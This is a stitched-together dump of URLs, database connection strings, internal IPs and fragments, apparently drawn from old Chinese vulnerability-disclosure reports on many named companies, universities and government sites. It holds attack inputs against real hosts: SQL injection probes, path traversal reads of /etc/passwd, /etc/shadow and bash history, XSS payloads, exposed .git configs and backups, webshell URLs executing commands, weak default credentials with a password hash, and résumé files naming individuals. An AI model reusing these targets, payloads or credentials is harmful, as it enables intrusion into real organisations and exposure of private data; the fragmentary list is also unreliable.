jdbc:sqlserver://10.98.0.6:1433;DatabaseName=bsrun jdbc:sqlserver://10.97.160.7:1433;DatabaseName=bsrun jdbc:sqlserver://10.98.16.6:1433;DatabaseName=bsrun jdbc:sqlserver://10.97.34.5:1433;DatabaseName=bsrun jdbc:sqlserver://10.98.192.8:1433;DatabaseName=bsrun jdbc:sqlserver://10.98.168.6:1433;DatabaseName=bsrun jdbc:sqlserver://10.98.17.20:1433;DatabaseName=bsrun http://www.ilvxing.com/Item/index/pro_id/106146 http://oa.tianya.cn:89/m1/cmd.jsp http://**.**.**.**/product.php?classcode=101101 http://**.**.**.**/new_detail.php?keyno=25 http://14.18.22.22/portal/Login/enterError.jsp http://14.18.22.22/portal/Login/合道科技服务目录.htm http://vip.gdpr.com/ http://vip.hopson.com.cn/ http://m.dianwoba.com/h5/order/order!status.do?orderId=93601408&from= http://ces.hhu.edu.cn:4848/login.jsf http://ces.hhu.edu.cn:4848/applications/upload.jsf http://www.gzshjs.gov.cn/list.shtml?nodeid=1 http://mng.zhenai.com/index.do http://info.17ugo.com/t13/hao24/?id=1 http://you.yaochufa.com/portal/feedback/index/page/2 http://you.yaochufa.com/portal/feedback/index/page/2 http://you.yaochufa.com/portal/feedback/index/page/2 http://bangong.aili.com/www.rar http://121.41.167.78/index.php?g=admin&m=public&a=login http://kw9.nbark.com:8888/Index.aspx http://m.dianwoba.com/h5/address!initEdit.do?lastUrl=&addrsId=2222227 http://wap.zhengzai.tv/forms/find_phone.html http://www.fan800.net/yiwankuai.php http://mall.360.com/user/doAddAddr http://222.240.176.22/ http://222.240.176.21/index.php?m=member&c=index&a=login http://85.16.17.12:8012/ https://cms.hit.edu.cn/.git/config http://www.oppein.cn/user/retakepassword http://114.251.251.53 http://114.251.251.53/pay/warning.jsp jdbc:oracle:thin:@10.0.14.163:1521:orcl jdbc:oracle:thin:@10.0.14.163:1521:orcl jdbc:oracle:thin:@10.0.14.163:1521:orcl http://my.adsmogo.com/Account/Edit http://**.**.**.**/ent/ktAction!checkUserName.do?user.userName= http://202.120.129.242/pathological/Content.php?pid=0&cid=2 http://www.zmifi.com/ryadmin/Index.asp http://vip.ufida.com.cn/nccsm/Admin.aspx www.xisu.edu.cn/news/display.php?id=11&table=intercourse http://180.97.34.106:8200//_search http://c2.yunpan.360.cn/docviewer/excelviewer?nid=14391836926105610&type=xls&id=undefined&hisFile=undefined&scid=32&size=271360 http://yunpan.cn/cdPf2i6VYK6uJ http://hr.bankwf.com:8822/UserFiles/Image/36L4j.jsp http://**.**.**.**/ http://122.225.201.204:8081/login.aspx http://122.225.201.204:8081/CodeTree/DownFile.aspx?fileurl=UpFile/../web.config user:192.1.1.176\administrator,如果在同一台机器上设置为空 http://122.225.201.204:8081/help.aspx?Id=5 http://112.65.142.236 http://112.65.142.236:8888 http://112.65.142.236:8090 http://112.65.142.236:8081/Test/ http://112.65.142.236:8081/scripts/ http://112.65.142.236:8081/account/ http://112.65.142.236:8081/Images/ http://112.65.142.236:8081/map/ http://112.65.142.236:8081/obj/Debug/ http://**.**.**.**/login.php http://**.**.**.**/fwsn.php?id=261 http://**.**.**.**/content.php?id=32331 http://**.**.**.**/fwsn.php?id=261: http://**.**.**.**/content.php?id=32331: https://www.erongbo.com http://58.49.58.75:40069/login.aspx http://58.49.58.75:40069/server.aspx http://e.shengjing360.com/elogin/toLogin http://learn.shengjing360.com/kbms/toPreview.action?type=N&doctype=D&docid=4523&from_sso=Y&userid=6561&ticket=0c7405d7e2eaebb155b74aaa4e646bfe http://kf.upgame.com.cn/admin.php?s=/Question/index/p/2 http://kf.upgame.com.cn/admin.php?s=/Question/index/p/2 http://kf.upgame.com.cn/admin.php?s=/Question/index/p/2 http://**.**.**.**/supplierPrintAction.action?action=printSup&sprNo=3202000013131&WebShieldDRSessionVerify=ua0k9Mc1l80qBvFcNGdV http://**.**.**.**/supplierPrintAction.action?action=printSup&sprNo=3202000013132&WebShieldDRSessionVerify=ua0k9Mc1l80qBvFcNGdV www.luculent.net/web.rar http://168.168.10.16这个IP http://www.eldshop.com/bbs/index.html?q=reply&action=quote&tid=48 http://media4.open.com.cn/L603/dongshi/zhongxiaoxxzjxyj/maincontent.asp?id=17 http://media4.open.com.cn/L603/dongshi/zhongxiaoxxzjxyj/kcsm.asp?id=147 http://media4.open.com.cn/L603/dongshi/zhongxiaoxxzjxyj/sybz.asp?id=174 https://ssl.hisense.com/+CSCOE+/logon.html http://ehr.hisense.com/ http://**.**.**.**:8089//user/user_news_show.aspx?id=10 http://m.tiexue.net/touch/Login.aspx这个接口是铁血网手机登陆接口,发现登陆处未做登陆限制 http://www.pioneerchina.com/minisite/pioneer-jtyl/Nsales_Info.php?id=6&titleCode=B01 http://m.meitun.com/login.html http://m.meitun.com/login.html http://506pingjia.cofco.com:8080/IR/fisummary.jsp?ClassID=13 http://www.360hitao.com/ https://member.360hitao.com/member/address.aspx https://member.360hitao.com/member/ashx/address.ashx?methods=edit&ruid=184063&_=1439197472540 https://member.360hitao.com/member/ashx/address.ashx?methods=delete&ruid=184063&_=1439197786725 http://bangong.aili.com/includes/ http://bangong.aili.com/config/ http://**.**.**.**/app_system_login/ http://www.erongbo.com/about.php?rid=122 http://simple.minanins.com:9004/install/ http://efly.cc/ec/ http://app.admin5.com/update.php http://app.admin5.com/template/admin/#union/union_gl http://em.cjlu.edu.cn/index.php?r=site/login http://218.202.44.100:81/TPlus/login.aspx http://list.qq.com http://list.qq.com/cgi-bin/qf_columnmgr?t=qf_resultcol&action=set&resp_charset=gbk&column_name=bbaaaddd&column_def=bababa&sid=EhMyXCMzj2ighR5L&alias_def=@'and www.guoshi.com www.guanggao.guoshi.com/teacher/admin/ http://fwjy.chinaiiss.com/ http://bbs.dji.com/plane.tar.gz http://bbs.dji.com/plane.tar http://**.**.**.**/**.**.**.**mon.php?action=modelquote&cid=1&name=spacecomments%20where%201=2 http://ehr.cofco.com/logonData.do# http://admin.by-health.com.cn/ http://www.jjwxc.cn/ http://task.iflytek.com/vs/Home/LogOn http://credit.open.com.cn/Home/LoginSubmit http://**.**.**.**/Login/Login.aspx www.jrt2010.com/htgl/member/company/ListMember.aspx http://xshd.jlau.edu.cn/read.asp?id=1039 http://qzlx.jlau.edu.cn/news/menusub.asp?stype=17 http://biolab.sdau.edu.cn/news_view.asp?c_id=199 http://www.ycdxoa.cn/ http://61.161.127.158/login.jsp http://bbs.joy-game.com/utility/convert/index.php http://123.59.13.112:8081/sysinfo/versions http://alwayson.hp.com.cn/AAS/CsoInfo.aspx?no=NBZCL00498&id=1 http://alwayson.hp.com.cn/AAS/CsoInfo.aspx?no=NBZCL00497&id=1 http://www.hupo.com/query_account1.php?UserName=CasterJs http://www.yongche.com/ajax/loaduser.php?callback=_loadUserDone&.js=aa&rd=18849.495749313934 http://admin.cnmo.com/stat_hits/pro_hits_statistic_plan_list.php?page=1 Username:NetCafe Password:123456 Hash:d608b7574ce96c797ecdb82a3bd121a6 http://222.195.76.136/News.php?id=13 http://222.195.76.136/News.php?id=13%20and%201=1正常 http://222.195.76.136/News.php?id=13%20and%201=2 http://222.195.76.136/News.php?id=13%20and%201=2%20order%20by%203 http://222.195.76.136/News.php?id=13%20and%201=2%20union%20select%201,2,3 http://101.227.20.238:8080 https://www.hhrfs.com:443/ www.hhrfs.com http://119.188.147.245/list http://119.188.147.56 http://119.188.147.50 http://119.188.147.201 http://119.188.147.200 http://106.120.155.111:8080/authentication/publishserverview http://106.120.155.75 http://106.120.155.76 http://106.120.155.77 http://106.120.155.78 http://admin.gzg2b.gov.cn/login.aspx?ReturnUrl=%2f http://t.anquan365.org/login.jsp http://**.**.**.**/login.aspx http://vmn.cheyou96366.com/default.aspx http://vmn.cheyou96366.com/Manage/ManagerHome.aspx http://vmn.cheyou96366.com/Manage/ManageComm.aspx http://vmn.cheyou96366.com/Manage/EnterNumberList.aspx?entid=273&CertType=0&isused=0&CertID=5733 http://dacheng.weimob.com/dclawmanage http://oa.gwbnsh.net.cn/member/MemberLogin.aspx http://800best.ihrscloud.com/ http://800best.ihrscloud.com/uploads/ http://yc.xcar.com.cn/beijing/solve/?cat=34&search=53,2 https://github.com/hyp19881119/My2014To2015 https://github.com/hyp19881119/My2014To2015/blob/master/AccountList.xls https://vpn.baidu.com/+CSCOE+/logon.html https://mytoken.baidu.com/login.jsp http://**.**.**.**/Home/Index www.datebao.com ftp://218.202.3.77 http://218.202.3.72:8080/right/login.do http://**.**.**.**/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../caches/configs/database.php https://github.com/YCjia/workSpace https://github.com/YCjia/workSpace/blob/9d4309374f48970b02470d4472cae843a89a841f/vrc-job/src/main/resources/topology.properties https://github.com/YCjia/workSpace/blob/master/vrc-job/src/main/resources/filters/prod.properties http://**.**.**.**/server-manage/admin/login.html http://**.**.**.**/server-ue2/busesMonitor/main.html http://202.108.173.78:8080 http://wz.edong.com/ http://**.**.**.**/jsjywxbmpt/login.aspx http://**.**.**.**/jsjywxbmpt/admin/UserManager/AddUsers.aspx http://**.**.**.**/jsjywxbmpt/WxSystem/WxToken.aspx http://**.**.**.**/ecs_vip/perfUser?signPhone=13880188991%27%3Cscript%3EAlert%28%22%22%29%3C/script%3E11111111111111111%3Cscript%3Ealert%28%22/xss/%22%29%3C/script%3E http://**.**.**.**/ecs_shop/nonvhl/showApplyInfoPage.do?pID=CPWX0605&qtnGroupNo=44b0b3b557ae473ba1ac05382ca68c59&qtnNo=1127685F21432708E054001517EDAD9C http://**.**.**.**/ecs_shop/nonvhl/showApplyInfoPage.do?pID=CPWX0607&qtnGroupNo=cd964f0d661a4cf0ab16f2134979c5e4&qtnNo=19921D13DAE823A9E054001517EDAD9C http://**.**.**.**/ecs_shop/nonvhl/showApplyInfoPage.do?pID=CPWX0607&qtnGroupNo=cd964f0d661a4cf0ab16f2134979c5e4&qtnNo=19921D13DAE823A9E054001517EDAD9C http://**.**.**.**/ecs_shop/vhl/calcvhlquoteresult.do?qtngroupno=2A3B1A2D6C734EF4B441831DA150FF7E&servcitycode=511700 http://**.**.**.**/ecs_shop/vhl/apply/inputapplyinfo.do?servcitycode=510800&qtnno=0586e3cc331c45fdaf8b7bbb948313fb&usevoucher=&qtngroupno=6323B94568DF47A5BF40A7245DAA595B http://**.**.**.**/ecs_shop/nonvhl/showApplyInfoPage.do?pID=CPWX0601&qtnGroupNo=09fa433cb7d1471e856f2f2ff2dd3c6a&qtnNo=135D029F6C535584E054001517EDAD9C http://**.**.**.**/ecs_shop/nonvhl/showApplyInfoPage.do?pID=CPWX0601&qtnGroupNo=4a125c8103c647e69503ac01237b53b2&qtnNo=0DC59EFD7819040EE054001517EDAD9C http://**.**.**.**/ecs_shop/nonvhl/showApplyInfoPage.do?pID=CPWX0602&qtnGroupNo=f667d4486d9243ed99d546362006058e&qtnNo=0F2B8D2AC9DE6DEDE054001517EDAD9C http://**.**.**.**/ecs_shop/nonvhl/showApplyInfoPage.do?pID=CPWX0604&qtnGroupNo=3cbe7a7e35a3453f80c8e615e82764fb&qtnNo=0C6D0ED95D732182E054001517EDAD9C http://**.**.**.**/ZWMdp/temp/source/B48F88119420E1AD7C0887362EFEC62F/19424521.html#xiangxipage http://**.**.**.**/ZWMdp/temp/source/994ECC91A6F1186B3393604B7BCE90F0/155343618.html https://www.yuancredit.com/cust/forgetpasswordone/0 http://www1.xjmu.edu.cn/hbxy/list_page_1.asp?classid=4 http://www1.xjmu.edu.cn/jjxx/list_page_1.asp?classid=64 http://www1.xjmu.edu.cn/hbxy/detail_page_ind.asp?articleid=688 http://www1.xjmu.edu.cn/hbxy/detail_page.ASP?articleid=741 http://222.197.183.145:8080/web/shop.do http://**.**.**.**/api/index.php?m=user&a=login&loginName=admin888&loginPass=123456&callback=jQuery183042493096832565613_1438956458577&_=1438956661891 http://**.**.**.**/api/index.php?m= http://**.**.**.**/p.asp?id=1 http://c3.cofco.com/index.php?app=public&mod=Passport&act=login http://jingang.yto56.com.cn/exptrack/main.action http://116.228.70.245/logout.aspx http://www.ewanse.com/userv3/forget http://union.mchina.cn/default.action http://www2.lib.nankai.edu.cn/nav/Chinese/show/data_search.asp www2.lib.nankai.edu.cn http://hzfz.hhu.edu.cn/ http://mba.cupl.edu.cn/mba/index/search_index?keyword=%E6%90%9C%E7%B4%A2 http://jydd.zjedu.org/common/key_xxgl.php http://twy.zjedu.org/search/key_xxgl.php http://vps.myxinnet.com/logs/20150804.txt http://info.17ugo.com/t20/cntvs/?id=1 http://info.17ugo.com/t30/jjlg/?id=1 http://info.17ugo.com/t4/best1/?id=1 http://info.17ugo.com/t5/3jgo/?id=1 http://info.17ugo.com/t6/ocjgo/?id=1 http://info.17ugo.com/t8/gxlsg/?id=1 http://**.**.**.** http://**.**.**.**/thadmin/admin.php http://beijing.anjuke.com/tycoon/p49 http://mendian.anjuke.com http://my.anjuke.com/ajkbroker/login/ http://my.anjuke.com/fxb/login/ http://www.dianwoba.com/auth/reset_password_01.do http://**.**.**.**/webgs/qycx.do?method=query http://**.**.**.**/webgs/qycx.do?method=enter http://college.weimob.com/Student.php http://college.weimob.com http://i.v.youmi.cn:80/thread/listOnAlbum/?albumid=133&state=1&page=2&orderby=1 http://data.fs.focus.cn/.git/config http://124.225.213.39/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/hosts http://vps.myxinnet.com/WhiteList/DomainLogShow.aspx?hn=longweier.com%27and%201=1--%20 http://vps.myxinnet.com/WhiteList/DomainLogShow.aspx?hn=longweier.com%27and%201=2--%20 http://jydd.zjedu.org/admin/login.php的登陆框也存在SQL注入漏洞 http://jydd.zjedu.org/admin/login.php http://zeaie.zjedu.org/admin/login.php http://www.xinhucaifu.com/news.php?id=198 http://www.datebao.com/pserson/center/email/send?email=XXXXDCC@163.com http://pk.tom.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=WEB-INF/resin-web.xml http://pk.tom.com/crossdomain.xml zyyd.media.open.com.cn/picexam/picexam_moni.asp?course_id=0002 http://zyyd.media.open.com.cn/picexam/examshowpic_test.asp?picid=12 http://www.apcl.zju.edu.cn/manage/admin/ http://www.wooyun.org/bugs/wooyun-2010-0133269/trace/d246c618a6cbd30397c92605a122d80b http://app.admin5.com http://www.qts-railway.com.cn http://qts.rails.cn/rqts/infor.jsp?company=1 http://vms.shunde.gov.cn/login.aspx http://www.tcsl.com.cn/ http://219.150.85.228:8888/ http://sso.daojia.58.com/index/index.do https://in.jimubox.com https://enchanter.jimubox.com/ http://192.168.3.198/zentaopms/www/user-login.html http://122.224.218.140:89/login.do http://122.224.218.140:89/login.do?message=103&verify= http://123.127.137.221:8080/CXPT/ http://**.**.**.**/classroom/tClassRoomList.action?accounts=1028585 http://**.**.**.**/space/notice/tnoticeContent.action?id=391&accounts=1007559 http://**.**.**/Index/Index http://nczx.ufida.com.cn www.998.com http://www.998.com http://www.998.com/MyStoredValueCard/ChooseRechargeWay?cardNo=卡号&cardType=0&userName=%E9%99%88%E7%94%9F&phone=手机号&rechargeMoney=1&operateNo=订单号&payType=0&status=0 https://114.255.42.211/ http://192.168.10.2/login.htm http://192.168.10.13:8080/login.aspx客户电话系统存在弱口令admin/123456 http://192.168.10.7/Default.aspx shell:http://192.168.10.7/hack.asp http://10.0.33.43/海康威视弱口令,可检测机房服务器 http://10.53.96.175/login.jsp http://10.53.96.170:8080/ http://192.168.1.41:8080/seeyon/index.jsp华润医药的协调管理系统,致远A8 https://192.168.1.111/ http://192.168.190.5/ http://10.0.62.231/ http://10.0.62.148/homeview.htm磁带库默认口令 http://10.0.62.160:8080/Etiri/login.action智能信息管理系统 http://192.168.14.10:8080/ http://10.0.76.89/Home/User/Login?redirect_uri=http%3A%2F%2F5icrc-uat.crc.com.cn%2F http://10.0.76.223/华润电力 http://10.0.76.172/crland-isp/ http://webtestmer.gopay.com.cn/webtest/trade/tradeQuery4027.do inurl:http://**.**.**.**/portal/jsp/wssw/dkfp/do_cx.jsp?type=update&id= http://**.**.**.**/portal/jsp/wssw/dkfp/do_cx.jsp?type=show&id=38a111f3-64ff-4a80-8cc4-830eecb91e51 http://**.**.**.**/portal/jsp/wssw/dkfp/do_cx.jsp?type=show&id=716d9517-abb7-4026-8bae-593494fa528d http://bbs.iunios.com/config/config_ucenter.php= http://drops.wooyun.org/papers/7830 http://faq.comsenz.com/library/UCenter/api/api_index.htm### http://**.**.**.**/baoming/mami.html http://**.**.**.**/baoming.zip www.shanlinjinrong.com http://www.shanlinbao.com/ http://mail.shanlinjinrong.com/ http://**.**.**.**/chinzdinfo/jsp/main.jsp http://sh.nuomi.com/uc/comment/submit?from=baidu.com&callback=%3cimg%20 http://www.e-189.com/ http://www.e-189.com/webcontext_v2/download/dlist/dAndroid.jsp http://www.e-189.com/UploadServlet?id=../../../../../../../../../../../../../../etc/passwd http://www.e-189.com/UploadServlet?id=../../../../../../../../../../../../../../etc/shadow http://www.e-189.com/UploadServlet?id=../../../../../../../../../../../../../../root/.bash_history http://219.143.252.189:8088 admin:123456 http://special.ifensi.com/admin/index http://www.ccztgps.com/login.aspx http://3g.zol.com.cn/game/download.php?game_id=13104&view_type=1 http://astro.wap.ifeng.com:8080/asxh/Jiyun.ashx http://cloud.efly.cc/syslogic/userUpdate.php?opt=upPasswd&newPasswd=123456 http://test.m.ifensi.com/ http://m.ifensi.com/正式系统同样存在 www.cnzz.com http://www.umeng.com/ http://mtj.baidu.com/web/dashboard https://accounts.google.com/ServiceLogin?service=androiddeveloper&passive=1209600&continue=https://play.google.com/apps/publish/&followup=https://play.google.com/apps/publish/&authuser=0 gmail.com/wuxian2012 http://**.**.**.**/ http://**.**.**.**:7777/Htgl/Login/Default http://**.**.**.**:8080/GSweb/ei/Ei!certificate.action?id=8a80812d47fc3f990148a1208ddd00a5 http://**.**.**.**:8080/GSweb/ei/Ei!certificate.action?id=297edff83d79cc2e013d8186e3d7001e http://**.**.**.**:8080/GSweb/ei/Ei!certificate.action?id=297edff83d19c570013d1aba8dcb0031 http://122.96.93.126/ http://122.96.93.126/ http://sg.oneplus.cn:808 http://sg.oneplus.cn:808/ https://**.**.**.**/ http://**.**.**.** ftp://222.132.55.50/DmsWebMain.asp http://125.64.74.20:801/ http://222.88.118.5:801/DmsWebLogin.htm http://223.100.217.158:801/ http://**.**.**.**/wcm/pcpsms/login.jsp http://zentao.yy.com/index.php?m=my&f=index http://upload.app.m.letv.com/android/static/uninstall_question.html?pcode=010110106 http://**.**.**.**/About.asp?aid=1 http://**.**.**.**/ReadArticle.asp?typeid=826 http://**.**.**.**/ReadNews.asp?id=2187 www.ytsanchuan.com/en/search.aspx?kw=1&page=1 http://www.ytsanchuan.com/admin/ http://eltest.aviva-cofco.com.cn/ http://www.998.com/Account/FindPassword http://www.998.com/Account/GetValidateCodeValue www.998.com http://www.998.com http://erpn.fang.com/ http://wx.minanins.com/console/login/LoginForm.jsp http://mail.minanins.com:9001/console/login/LoginForm.jsp http://**.**.**.**/login.jsp http://**.**.**.**/ioop-bcs-web/sys/sys-pwd-question!modifyInput.do?modifyPwdToken=RzjaG2Wmx31qBrlj50PGu2u35V768BTAl5cN2ghOmb6DUJRVGmw38DGgs/MMzrZOlhzcTFM3e0hffx4Cn%2006ZA== http://v.v89.com:80/v89/show/漏洞点/ http://c3.cofco.com/ http://www.zhenfund.com/phpmyadmin/ http://**.**.**/pages/registration/pr_application-show.htmlpra_id=12000000000335488&rpi_id=799378229&cti_id=1&pti_id=0&start1=show&start2=s http://job.xueersi.cn/xuanpin/azpRes/detail.do?regUserId= site:job.xueersi.cn http://job.xueersi.cn/xuanpin/azpRes/detail.do?regUserId=1230 http://**.**.**.**/bugs/wooyun-2015-0131940上了首页,于是挖着看看 http://**.**.**.**/sc/product_details.aspx?c_kind=2&c_kind2=4&c_kind3=34&id=32 http://**.**.**.** www.meihua.info URL:http://kdjyxk.post.gov.cn/register_logout.do http://town.iuni.com/post/12482 http://**.**.**.**/sqsupdate/updateManage.jsp https://**.**.**.**:8080/web2013/order/myspace_ordered.jsp http://ichtf.dbw.cn:80/ http://www.100eshu.com http://user.100xuexi.com/login.aspx http://**.**.**.**/bugs/wooyun-2015-0131940 http://**.**.**.**/bugs/wooyun-2015-0133395 http://**.**.**.**/sc/about.aspx?c_kind=12&c_kind2=17 http://**.**.**.**/sc/feedback.aspx?c_kind=7&c_kind2=44 http://**.**.**.**/sc/Products.aspx?pc_key=seach&key=%C8%C8%CB%AE%C6%F7 http://**.**.**.**/video.aspx?c_kind=2&c_kind2=77 http://**.**.**.**/news_det.aspx?c_kind=2&c_kind2=77 http://**.**.**.**/sc/product_details.aspx?c_kind=2&c_kind2=4&c_kind3=34&id=32 http://**.**.**.**/sc/newsDetial.aspx?ID=439&c_kind=9&c_kind2=10 http://**.**.**.**/sc/product_details.aspx?c_kind=2&c_kind2=5&c_kind3=36&id=5 http://**.**.**.**/zhuanti/shlist.aspx?ID=1334&p_kind=&c_kind=206&c_kind2=214&c_kind3=217 http://219.143.252.220/yyoa/checkWaitdo.jsp?userID=1 https://github.com/MiaoJiHui/bysj_mjh/blob/e78bc5695e1afd14579ad27fb27fdd852cadaef4/bysj_mjh/WebRoot/WEB-INF/classes/com/bysj/test/mail.properties http://**.**.**.**/ http://**.**.**.**/index.php/main/forgetpwd http://**.**.**.**/ crm.longhoo.net/login.aspx http://**.**.**.**/ebp/index.jsp,江苏烟草网上订货平台,如图所示: http://**.**.**.**/bugs/wooyun-2010-0110737 inurl:/cms/searchManage/ http://**.**.**.**/cms/searchManage/search_process_nw.jsp http://**.**.**.**/cms/searchManage/search_process_hn.jsp http://**.**.**.**//cms/searchManage/search_process_sp.jsp http://**.**.**.**/cms/searchManage/search_process_gt.jsp http://**.**.**.**/cms/searchManage/search_process_rc.jsp http://**.**.**.**/cms/searchManage/search_process_hn.jsp http://**.**.**.**:80/bxcx.aspx http://**.**.**.**:80/bxcx.aspx http://210.40.30.21/invoker/JMXInvokerServlet http://bbs.zt-express.com:8008/doc/page/main.asp admin:12345 https://地址/src/system/addmanageuser.php?&IG_current_menu_name=系统配置&IG_current_submenu_name=管理设置 http://**.**.**.**/bugs/wooyun-2015-0119537 http://**.**.**.**/main/login.jsp http://**.**.**.**/upload/mas/message/image/ba57b8e14f0c9a71014f1d3b4e3b6014.jsp http://**.**.**.**/main/login.jsp http://**.**.**.**/main/login.jsp http://**.**.**.**/main/login.jsp http://**.**.**.**/main/login.jsp http://wms.fday.co/account/login http://www.dianping.com/.git/config http://**.**.**.**/index/index.aspx https://github.com/niexiaolong/xrm/blob/451be28b44190f6daa44b561d4770b35b2e51259/src/main/resources/logback.xml http://www.wochacha.com/ajax/getmode?bid= http://www.wochacha.com/newsqs/subjectlist?scid=0 http://www.wochacha.com/help/?selecttab=8 http://www.wochacha.com/index.php?m=Product&a=shoppingcart http://www.wochacha.com/index.php?m=History&a=index&p=2 http://114.112.82.120:8082/index.php http://114.112.82.120:8082/c.php kali:/srv/redis-2.8.19# redis_version:2.6.14 redis_git_sha1:00000000 redis_mode:standalone os:Linux multiplexing_api:epoll gcc_version:4.1.2 process_id:471 run_id:089b0be0318f65d05daf9b101171c8a2680669e7 tcp_port:6379 uptime_in_seconds:25394685 uptime_in_days:293 lru_clock:1323876 used_memory:1167247632 used_memory_human:1.09G used_memory_rss:1195913216 used_memory_peak:1180578616 used_memory_peak_human:1.10G used_memory_lua:31744 mem_fragmentation_ratio:1.02 mem_allocator:jemalloc-3.2.0 rdb_last_save_time:1439301735 total_connections_received:704 total_commands_processed:9067939 keyspace_hits:4716006 keyspace_misses:2871824 latest_fork_usec:25296 role:master used_cpu_sys:201.55 used_cpu_user:203.62 used_cpu_sys_children:124.93 used_cpu_user_children:734.80 db0:keys=1007466,expires=0 db5:keys=2582,expires=0 http://**.**.**.**/login.do user:test passwd:123456 http://**.**.**.** http://**.**.**.** http://**.**.**.** http://evonik.hiall.com.cn/php.php http://www.nwnu.edu.cn/cate.do?dept=0018 http://eduyun.nwnu.edu.cn/websites/index.php?g=CommonTempt&m=Article&a=index&t=CommonTempt1&webid=1000043&id=1000077&channelid=1000079&articleid=1001198 http://125.64.74.20:8400 http://www.isilic.org/thread-3984-1-1.html http://wanmei.hiall.com.cn/admin.txt http://**.**.**.** http://**.**.**.**/install/abc.php http://jumei.ihrscloud.com/login/doLogin http://jumei.ihrscloud.com/uploads/projects/attatchments/1405498514249北京光辉海德猎头推荐-运维总监-杜鹏-16702014.doc http://jumei.ihrscloud.com/uploads/projects/attatchments/1409134485930云迈20140814-UED总监-常成 http://jumei.ihrscloud.com/uploads/projects/attatchments/1404808384042吴朝简历.doc http://jumei.ihrscloud.com/uploads/projects/attatchments/1403770074006高鹏 http://jumei.ihrscloud.com/uploads/projects/attatchments/1405676079508巩文+PHP工研发工程师+北京+第一资本猎头 http://114.251.242.156:7003/cas/login http://114.251.242.156:7003/system/warning.jsp http://demo.jsqqy.com/Login.aspx?ReturnUrl=%2fdefault.aspx&AspxAutoDetectCookieSupport=1 http://szdcs.jsqqy.com http://xczf.jsqqy.com/ kali:/home/clusterd# http://116.228.70.218:8080/snspam/homepage.asp http://5sing.kugou.com/getpass/reset?id=UID&token=TOKEN http://**.**.**.**/culture.php?act=article&id=550 http://bbs.corp.anjuke.com/?2 http://www.shouji56.com/soft/TianDiXing_95730/ http://try.suning.com/tps/mianfei/now/list.htm?currentpage=1&sort= http://**.**.**.**/Homepage/DownLogin.aspx http://**.**.**.**/ http://**.**.**.**/login.aspx http://cps.189.cn/ http://**.**.**.** http://**.**.**.**/login/login.aspx http://112.124.212.5/index.php/Institution/index/p/1/money/2/deadline/22 http://112.124.212.5/index.php/Institution/index/p/1/money/2/deadline/22 http://drops.wooyun.org/tips/604 http://124.127.49.91:7001/is/cmd.jsp?pwd=023&cmd=ps%20aux http://dfj.buaa.edu.cn/About.aspx?Aid=1 http://dfj.buaa.edu.cn/NewList.aspx?Typeid=7 http://222.74.2.54/phpmyadmin/ http://m.rongzi.com:80/ajax/GetProductByTagPageCity.ashx?city=www http://app.cnmo.com http://www.yifutu.com/zbfzzdyxuqiu.html?fdsTid=35714 http://zhuanti.club.women.sohu.com/user_webpage/webpage_checkview.php?webid=17814 http://**.**.**.**/basic_detail.asp?id=9 http://**.**.**.**/p_work.asp?id=3 http://**.**.**.**/p_sta.asp?id=3 http://**.**.**.**/zwftcontent.php?id=25199 http://**.**.**.**/gjSearchList.php?keyword=%22%2F%3E%3Csvg+onload%3Dalert%28%2F1%2F%29%3E http://dmoo.cofco.com/dmoo/ http://100w.55bbs.com/list.php?order=1 http://**.**.**.**/member/common/login/ http://**.**.**.**/Style/header/upload.php?uid=498 http://**.**.**.**/bugs/wooyun-2010-0123011 http://www.95598.ha.sgcc.com.cn:8100/console/login/LoginForm.jsp http://**.**.**.**/Login.aspx http://**.**.**.**/aspx/login.aspx?logout=1 http://**.**.**.**/aspx/login.aspx http://**.**.**.**/ http://www.wochacha.com/index/search?tp1=4&tp2=0&clid=1209 http://www.wochacha.com/index.php?m=Question&a=index&category=80 http://www.wochacha.com/index/search?q=1 http://www.wochacha.com/m/brand?brand_id= http://www.wochacha.com/directsale/search?tp1=34 http://www.wochacha.com/index/search?tp1=4&tp2=0 http://www.wochacha.com/index/search?tp1=4&tp2=0&clid=1209* http://sqlmap.org http://www.taohuichang.com/thc/goThirdPage http://zf.hntv.tv/wwwroot.rar http://**.**.**.**/Login.aspx http://mt.longtugame.com/mt.zip http://kfcloud.dper.com/login.html http://**.**.**.**/Public/login.html http://**.**.**.**/bugs/wooyun-2010-0122796,其实这个是CRM,不要搞成ERP啦~发现居然是通用。厂商没有标示啊,看看CNCERT怎么做吧~ http://**.**.**/general/ERP/LOGIN/index.php_ http://**.**.**/general/ERP/LOGIN/index.php_ http://**.**.**//general/ERP/LOGIN/index.php_ http://**.**.**/general/ERP/LOGIN/index.php_ http://**.**.**/general/ERP/LOGIN/index.php_ http://**.**.**/general/ERP/LOGIN/_ http://**.**.**/general/ERP/LOGIN/_ http://**.**.**/app/SunshineCRM/general/ERP/LOGIN/_ http://**.**.**/general/ERP/LOGIN/_ http://**.**.**/general/ERP/LOGIN/_ http://**.**.**/general/ERP/LOGIN/_ http://**.**.**/general/ERP/LOGIN/_ http://m.dudu.ztgame.com/detail.php?d=../../../../../../etc/passwd http://m.dudu.ztgame.com/detail.php?d=../../../../../../usr/local/apache2/conf/httpd.conf http://www.luneng.com/Plugin/FileManage/uploadfile.aspx http://www.luneng.com/Upload/201508/youxiu.aspx http://www.luneng.com/Upload/201508/youxiu.aspx http://test.waimai.dianping.com http://test.waimai.dianping.com http://s.waimai.dianping.com http://s.waimai.dianping.com http://www.id68.cn/app/index/savepwd.html www.id68.cn http://service.zol.com.cn/survey_new/save_new.php http://124.251.14.82/1.txt url:http://www.pangthai.com/ http://**.**.**.** http://ips.huoyunren.com/ips.php?ips=ips http://wap.gz.10086.cn http://www.ksyun.com/ http://www.ksyun.com/data/ksyun/apply/e7def06e-7459-4c2e-b488-1d7bd02cb795.htm http://**.**.**.**/frontStage!queryMessage.action http://**.**.**.**/ http://gzly.12386.gov.cn/csrc/sh.web.onlinecall.validatePassWord.sh?queryCode=1&pwd=1 http://**.**.**.** http://**.**.**.**/administrator/admin_login.aspx http://ichtf.dbw.cn/ltd/enterprise.php?id=32146 http://radio.3g.cnfol.com/index.php?r=Radiostation/Detail&id=%E6%9D%A8%E6%9C%8B%E5%A8%81 http://radio.3g.cnfol.com/index.php?r=Radiostation/Dragonfly&id=8 http://**.**.**.**/Article.php?TableId=1&ChannelId=8&id=903 http://**.**.**.**/login.jsp http://cos.sto.cn:89/manager/admin/login.do http://**.**.**.**/admin/ http://roadshow.cnfol.com/show/13610?type=0&name=1&sort=0 